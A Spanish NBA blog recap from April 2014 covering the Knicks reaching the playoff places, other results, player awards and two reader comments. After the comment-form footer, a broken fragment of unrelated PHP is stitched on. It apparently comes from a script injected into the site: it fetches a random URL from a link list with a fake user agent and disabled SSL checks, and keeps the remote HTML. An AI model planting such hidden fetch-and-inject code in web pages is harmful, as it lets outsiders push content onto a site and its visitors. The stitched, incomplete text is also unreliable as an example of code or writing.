La Crónica: Ver para creer, los Knicks en playoffs

03 de April de 2014 por Simon

Un miércoles más teníamos maratoniana jornada en la NBA con la participación de 26 equipos. Para lo larga que fue la jornada apenas se dieron sorpresas y sólo en un partido no ganó el favorito. Al no haber sorpresas los cambios en la clasificación fueron escasos en número pero enormes en importancia y es que los New York Knicks son desde esta madrugada equipo de Play Off. Los Knicks recibían ayer a los Nets en un interesantísimo derbi con mucho más en juego para los locales que para los visitantes, que además venían de jugar la noche anterior. Fruto de esta necesidad, New York dominó el partido en todo momento apoyados en el tridente Smith, Hardaway y Melo que estuvieron especialmente acertados. En la primera parte  los Knicks anotaron un 66.7% de sus tiros, su mejor marca desde 2005. Con 25 puntos de diferencia al descanso, el segundo tiempo fue totalmente prescindible en un duelo que se preveía apasionante en la previa (81-110). Jornada perfecta para los mejorados Knicks que por fin logran colarse en el octavo puesto a costa de los Hawks que perdieron en su casa ante unos Bulls que apenas tuvieron que emplearse a fondo. Los “toros” tuvieron suficiente con un gran Augustin y el normal buen desempeño del resto de compañeros para vencer fácilmente (105-92). El balance de los Hawks en los últimos 30 partidos es de las peores de la liga, más típico de un equipo que busca aumentar sus posibilidades en la lotería del Draft y eso, aún estando en el Este, se tenía que acabar pagando. A los Bulls la victoria no les sirvió de mucho porque los Raptors, sus máximos rivales en la clasificación, cumplieron ante los Rockets y también se llevaron el triunfo en un partido con muchas idas y venidas (103-107).

Pero vamos con los grandes favoritos ahora mismo para llevarse el anillo. 19 son ya las victorias consecutivas que acumulan los San Antonio Spurs, cifra insignificante si la comparamos con la superioridad con la que derrotan a sus rivales. Ayer los Golden State Warriors no fueron rival y ya en el primer cuarto los dejaron tirados cual colilla en la carretera  para simplemente dedicarse a cumplir el expediente el resto del partido (90-111). 

La lucha por los Play Off del Oeste sigue apasionante con 3 equipos igualados a 44 victorias y 31 derrotas. Ayer tanto Memphis como Suns perdieron la oportunidad de dejar atrás a los Mavs. Más grave fue lo de los Grizzlies que perdieron en la cancha de Minnesota Timberwolves de manera clara en un partido en el que apenas Marc Gasol y Courtney Lee dieron la cara.  Por momentos parecía que los que se estaban jugando la clasificación para Play Off eran los locales que estuvieron mucho más intensos que sus rivales (88-102). Toque de atención serio para los osos que han bajado el ritmo desde que lograron entrar en puestos de postemporada. Más complicado lo tenían los Suns que se enfrentaban a los potentes Clippers que están terminando la temporada en una forma extraordinaria. Los Suns se mantuvieron por delante durante casi todo el encuentro e incluso dispusieron de 10 puntos de renta en el último cuarto pero el gran desempeño de los visitantes en los minutos finales los dejó sin recompensa y en la novena posición del Oeste (112-108).

La jornada de ayer nos dejó también partidos muy desiguales con varias victorias por encima o muy cerca de los 20 puntos de diferencia. Los Heat no querían sorpresas ante los Bucks y así lo demostraron desde el inicio, dejando el partido sentenciado en los primeros 12 minutos (77-96). Obviamente contra los Bucks no se pueden sacar excesivas conclusiones pero por la implicación que mostraron dio la impresión de que adelantar a los Pacers puede haber sido un punto de inflexión para el equipo tras varios meses de escaso rendimiento como equipo. Por su parte los Bobcats apabullaron a los Sixers (123-93), los Cavs también solventaron rápido su partido ante los Magic (119-98) y los Wizards ganaron a los Celtics cuando y como quisieron (92-118). Los Nuggets cierran el capítulo de amplias victorias con la mayor anotación de la noche ante los Pelicans (107-137) de la mano de un gran Faried al que la búsqueda de un nuevo contrato parece haber espoleado durante el último mes.  Como podéis comprobar la de anoche fue la jornada con mayor número de palizas de la temporada.

Sólo nos quedan dos partidos por repasar. Los Pacers vencieron a los Pistons pero siguen dejando muchísimas dudas en cuanto a su rendimiento. Detroit les causó demasiados problemas hasta que les llegó el ya tradicional apagón del último cuarto (94-101). El problema de los Pacers es que varios jugadores, por no decir todos, se han creído mejores individualmente de lo que son. Para terminar, en el partido más insignificante de la noche los Kings vencieron a los Lakers con 20 puntos y 10 rebotes de Cousins en apenas 20 minutos (102-107).

PREMIOS

MVP:  Kenneth Faried aprovechó la retirada por lesión de Anthony Davis para reinar en las zonas. Anotó 34 puntos, el máximo de su carrera y cogió 13 rebotes. Como postre, nos dejó unos cuantos de esos mates tan espectaculares que tanto nos gustan. Por su parte, Kevin Love consiguió su 2º triple doble (24-16-10) en 4 partidos ante nada menos que Zach Randolph y Marc Gasol.

Rookie: Otro buen partido de Ray McCallum que parece confirmar las buenas sensaciones que dejó en los partidos de la Summer League. 27 puntos, 4 rebotes, 5 asistencias. Vaya ojo tienen los Kings para draftear bases en 2ª ronda.

Sorpresa: No sé si vale le pena seguir destacando a Aaron Brooks cada vez que hace un buen partido (24p). Prometo que hoy será la última. Nos quedamos mejor con Anthony Tolliver que disfrutó de minutos ante los Sixers y nos dejó 16 puntos, 8 rebotes y 5 asistencias.

Decepción: Stephen Curry repartió 10 asistencias pero se quedó en 11 puntos con un 5 de 15 y perdió 4 balones. Enfrentarse a los Spurs es demasiado incluso para un superclase como él.

Esfuerzo en vano: Ante la baja de Anthony Davis tuvo que ser Tyreke Evans quien tirara de los suyos. Acabó con buenos números (27p y 8 r) pero los Pelicans nunca estuvieron cerca de la victoria.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

2 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    Bastante curiosa la serie entre los Nets y los Knicks,aunque se presente como la batalla de La Gran Manzana,etc.,ni un solo partido ha sido disputado,resolviéndose siempre por esas rentas sobre la treintena de puntos.Desde luego se ve otro rollo en los Knicks,incluso con un Stoudemire que -toquemos madera- está rindiendo bastante bien alejado de esas malditas lesiones.

      Citar

  2. Vader dice:
    #2

    Voy a colgar este enlace aquí, donde se habla de que los Knicks ya están en puestos de playoff:

    http://blogs.as.com/showtime/2014/04/grandes-mentiras-de-la-humanidad-no-se-puede-ganar-con-carmelo.html

    Merecida, en mi opinión, defensa de Carmelo Anthony.

    Saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>